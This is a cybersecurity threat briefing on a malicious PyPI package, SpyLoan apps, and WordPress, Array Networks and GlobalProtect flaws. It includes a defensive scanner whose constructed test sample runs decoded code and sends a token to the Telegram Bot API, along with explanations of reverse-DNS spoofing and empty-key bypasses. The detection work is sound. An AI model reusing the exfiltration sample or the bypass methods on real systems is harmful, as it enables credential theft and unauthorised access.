
Cyware Daily Threat Intelligence, November 26, 2024


Daily Threat Briefing Nov 26, 2024

Even trusted repositories aren't immune to compromise, as PyPI users recently learned. The aiocpa package, a Crypto Pay API client downloaded over 12,000 times, was found to contain malicious code in its latest version. The update enabled attackers to steal private keys by sending victims’ API tokens to a Telegram bot, highlighting the risks of even well-used libraries.

A pair of critical vulnerabilities in the CleanTalk WordPress plugin has left over 200,000 websites exposed. Attackers can exploit these flaws to bypass authorization and install malicious plugins or execute arbitrary code. Users are strongly advised to update to the latest version to secure their sites.

Even the VPN client on the endpoint isn't exempt from security gaps. Palo Alto Networks disclosed a certificate validation flaw in its GlobalProtect app that lets an attacker redirect the app to an unauthorized server and install a malicious root certificate on the endpoint, which can then be used to deliver malware signed under that certificate.

Top Malware Reported in the Last 24 Hours

PyPI library exfiltrates crypto keys

The PyPI repository has quarantined the aiocpa package after discovering that a recent update included malicious code designed to exfiltrate victims' API tokens to an attacker-controlled Telegram bot. The package, a Crypto Pay API client, was originally released in September and had been downloaded 12,100 times. The malicious code appeared in version 0.1.13 of the library as an obfuscated blob that is decoded and executed at import time, capturing the Crypto Pay API token and transmitting it through the Telegram Bot API. Earlier releases did not carry the payload, so pinning to a known-good version and comparing the installed distribution against the project's published source are the practical checks for anyone who depends on it.
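The two behaviours described above, a blob that is decoded and executed at runtime and a hard-coded Telegram Bot API endpoint, can be flagged before a package is installed. The following scanner is an added example written for this briefing; it is not code from the aiocpa project, PyPI, or the researchers who reported the compromise, and the two sample modules it checks are constructed here and do not reproduce the real payload. It parses each module with Python's ast module and reports exec()/eval() calls whose argument comes from a decoder or decompressor, plus any string literal containing the Telegram Bot API path.

```python
import ast
import os
import re
from typing import List, Tuple

# Markers of the two behaviours described in the briefing: code that is
# unpacked and executed at runtime, and a hard-coded Telegram Bot API URL.
TELEGRAM_BOT_RE = re.compile(r"api\.telegram\.org/bot", re.IGNORECASE)
DECODER_NAMES = {"b64decode", "b32decode", "b85decode", "a85decode",
                 "unhexlify", "decompress", "fromhex"}


def _uses_decoder(node: ast.AST) -> bool:
    """True if any call inside node invokes a known decoder/decompressor."""
    for sub in ast.walk(node):
        if isinstance(sub, ast.Call):
            func = sub.func
            name = None
            if isinstance(func, ast.Attribute):
                name = func.attr          # base64.b64decode, zlib.decompress
            elif isinstance(func, ast.Name):
                name = func.id            # b64decode after `from base64 import *`
            if name in DECODER_NAMES:
                return True
    return False


def scan_source(src: str, filename: str = "<module>") -> List[Tuple[int, str]]:
    """Return (line, reason) findings for one Python source text."""
    findings: List[Tuple[int, str]] = []
    tree = ast.parse(src, filename)
    for node in ast.walk(tree):
        # exec(<decoded blob>) / eval(<decoded blob>)
        if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and node.func.id in ("exec", "eval") and node.args
                and _uses_decoder(node.args[0])):
            findings.append((node.lineno, "exec/eval of decoded or decompressed data"))
        # Hard-coded Telegram Bot API endpoint in a string literal
        if (isinstance(node, ast.Constant) and isinstance(node.value, str)
                and TELEGRAM_BOT_RE.search(node.value)):
            findings.append((node.lineno, "hard-coded Telegram Bot API URL"))
    return findings


def scan_tree(root: str) -> List[Tuple[str, int, str]]:
    """Walk an unpacked sdist or wheel directory and scan every .py file."""
    results: List[Tuple[str, int, str]] = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.endswith(".py"):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for line, reason in scan_source(fh.read(), path):
                        results.append((path, line, reason))
    return results


# Constructed sample modules for this example (not the real aiocpa payload).
SAMPLE_CLEAN = '''
import base64

def load(payload):
    # Decoding data is normal; only decode-then-exec is flagged.
    return base64.b64decode(payload)
'''

SAMPLE_SUSPICIOUS = '''
import base64, zlib, urllib.request

exec(zlib.decompress(base64.b64decode("PLACEHOLDER_BLOB")))

def leak(token):
    url = "https://api.telegram.org/bot" + BOT_TOKEN + "/sendMessage?text=" + token
    urllib.request.urlopen(url)
'''

if __name__ == "__main__":
    for name, src in (("clean", SAMPLE_CLEAN), ("suspicious", SAMPLE_SUSPICIOUS)):
        print(name, scan_source(src) or "no findings")
```

To check a real release, fetch the source distribution without installing it (for example `pip download --no-binary :all: --no-deps <package>==<version>`), unpack it, and pass the directory to scan_tree(). The check is a heuristic: it catches the decode-then-exec shape and the obvious exfiltration endpoint, but an obfuscator that builds the decoder name or URL at runtime will evade it, so treat a clean result as one signal and not as proof.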

Surge in SpyLoan observed

McAfee found a notable rise in SpyLoan apps, which are deceptive loan applications primarily on Android. These apps, referred to as Potentially Unwanted Programs (PUPs), trick users into divulging sensitive information and granting excessive permissions, potentially leading to extortion and financial losses. The team discovered 15 different loan apps with over eight million installations, mainly operating in South America, Southern Asia, and Africa, utilizing social media for promotion.

Top Vulnerabilities Reported in the Last 24 Hours

200,000 WordPress sites impacted by critical bugs

Critical vulnerabilities in the Anti-Spam by CleanTalk WordPress plugin impact over 200,000 installations. CVE-2024-10542 and CVE-2024-10781 allow unauthenticated attackers to install and activate arbitrary plugins, which can lead to remote code execution. The first is an authorization bypass via reverse DNS spoofing: the plugin trusted the hostname returned by a reverse DNS lookup of the requesting IP address, and an attacker who controls the PTR record for their own address can make that lookup return an allowed name. The second stems from a missing check for an empty API key value, so a request carrying an empty key could pass the check on a site where no key was configured. Both vulnerabilities carry a CVSS score of 9.8, and users are urged to update the plugin immediately to version 6.45.
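Both flaws are instances of general patterns worth recognising in any code that authorises callers by network identity. The following Python sketch is an added example, not the plugin's code and not a description of how CleanTalk's fix is implemented; the DNS records, host names and IP addresses in it are constructed for the example. It contrasts authorising on a PTR name alone with forward-confirmed reverse DNS (the PTR name must resolve back to the caller's address), and shows an API key comparison that rejects empty or unset keys before doing a constant-time compare.

```python
import hmac
from typing import Callable, Dict, Optional, Set

# Constructed DNS data for this example (hypothetical names, documentation IPs).
# 198.51.100.10 is the vendor's real API host. The attacker owns 203.0.113.7 and
# controls its PTR record, so the reverse lookup claims the vendor's name, but
# the vendor's forward zone never points that name at the attacker's address.
FAKE_PTR: Dict[str, str] = {
    "198.51.100.10": "api.vendor.example.",
    "203.0.113.7": "api.vendor.example.",     # spoofed PTR
}
FAKE_A: Dict[str, Set[str]] = {
    "api.vendor.example": {"198.51.100.10"},
}
TRUSTED_DOMAIN = "vendor.example"


def reverse_lookup(ip: str) -> Optional[str]:
    """Stand-in for socket.gethostbyaddr(); returns the PTR name or None."""
    return FAKE_PTR.get(ip)


def forward_lookup(name: str) -> Set[str]:
    """Stand-in for socket.getaddrinfo(); returns the A records for a name."""
    return FAKE_A.get(name, set())


def _normalize(name: str) -> str:
    return name.rstrip(".").lower()


def _in_trusted_domain(name: str) -> bool:
    name = _normalize(name)
    # Exact match or dotted suffix only, so "evil-vendor.example" is rejected.
    return name == TRUSTED_DOMAIN or name.endswith("." + TRUSTED_DOMAIN)


def allowed_by_ptr_only(ip: str,
                        reverse: Callable[[str], Optional[str]] = reverse_lookup) -> bool:
    """Vulnerable pattern: authorise on whatever the PTR record claims."""
    name = reverse(ip)
    return name is not None and _in_trusted_domain(name)


def allowed_by_fcrdns(ip: str,
                      reverse: Callable[[str], Optional[str]] = reverse_lookup,
                      forward: Callable[[str], Set[str]] = forward_lookup) -> bool:
    """Forward-confirmed rDNS: the PTR name must resolve back to the caller's IP."""
    name = reverse(ip)
    if name is None or not _in_trusted_domain(name):
        return False
    return ip in forward(_normalize(name))


def api_key_matches(configured: Optional[str], supplied: Optional[str]) -> bool:
    """Reject empty or unset keys outright, then compare in constant time."""
    if not configured or not supplied:
        return False
    return hmac.compare_digest(configured.encode(), supplied.encode())


if __name__ == "__main__":
    for ip in ("198.51.100.10", "203.0.113.7"):
        print(ip, "ptr-only:", allowed_by_ptr_only(ip),
              "fcrdns:", allowed_by_fcrdns(ip))
    print("empty keys accepted:", api_key_matches("", ""))
```

Forward confirmation closes the spoofed-PTR hole, but it still delegates authorisation to DNS: an attacker who can poison the resolver the server uses would pass it. For a vendor callback the durable fix is to authenticate the request itself, for example with a shared secret or a signature over the body, and to treat the DNS check as defence in depth at most.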

Patch critical Array Networks, warns CISA

CISA added a critical security flaw in Array Networks AG and vxAG secure access gateways to its KEV catalog following reports of active exploitation. The vulnerability (CVE-2023-28461) stems from a missing authentication check and allows remote code execution; it has been targeted by a China-linked cyberespionage group tracked as Earth Kasha. Federal agencies are required to apply the patches by December 16.

PoC available for GlobalProtect app flaw

Palo Alto Networks identified a vulnerability (CVE-2024-5921) in its GlobalProtect app: insufficient certificate validation allows an attacker to connect the app to an arbitrary server and install a malicious root certificate on the endpoint, which can then be used to install malware signed under that certificate. Exploitation requires a local non-administrative user on the endpoint or an attacker on the same subnet who can redirect the app to a server they control. The vulnerability affects various versions of the GlobalProtect app on Windows, macOS, and Linux. While the company is not aware of any malicious exploitation so far, it advised users to update to version 6.2.6 or later on Windows. For other platforms, users are advised to run the app in FIPS-CC mode and enforce strict certificate validation during installation to prevent exploitation of this vulnerability.
